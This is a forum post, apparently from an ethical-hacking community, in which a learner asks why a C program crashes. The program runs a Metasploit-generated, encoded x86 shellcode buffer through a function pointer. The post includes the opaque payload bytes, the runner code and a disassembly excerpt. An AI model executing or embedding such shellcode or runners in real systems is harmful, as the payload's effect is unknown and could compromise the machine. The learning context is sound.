Instead of using shellcode from generators etc, I decided to learn how to write shellcode myself. So the first step would be writing something that can test the shellcode before I attempt to use it in exploits.
I googled around a bit and found a few C/C++ examples of how to do it. It makes use of a function pointer that points to the shellcode buffer. Well I keep getting an exception about some access violation. I don't really like to ask questions, because maybe I should google around some more and find out on my own. I'm not sure if there's something wrong with the shellcode because I don't know how to write it yet.
Heres my code, I compiled it with Microsoft Visual C++ 2008.
#include <stdio.h>
// The x86 shellcode to run. Generated with Metasploit.
char shellCode[] =
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";
int main()
{
void (*shell)(); // Function pointer.
shell = (void(*)()) (&shellCode);
printf("Shellcode at: %p\n", shellCode);
printf("Function pointer points to: %p\n", shell);
// Run it!
printf("Running shellcode...\n");
shell();
return 0;
}
And I'm getting this from the assembly. I see it fails after the call to the shellcode.
// Run it!
shell();
008813FC 8B F4 mov esi,esp
008813FE FF 55 F8 call dword ptr [shell]
breaks here --> 00881401 3B F4 cmp esi,esp
00881403 E8 33 FD FF FF call @ILT+310(__RTC_CheckEsp) (88113Bh)
I hope you guys can help me! Or at least point me in the right direction. Thanks in advance.
ZF
News Items and General Discussion About EH-Net : Change is Coming to EH-Net!!
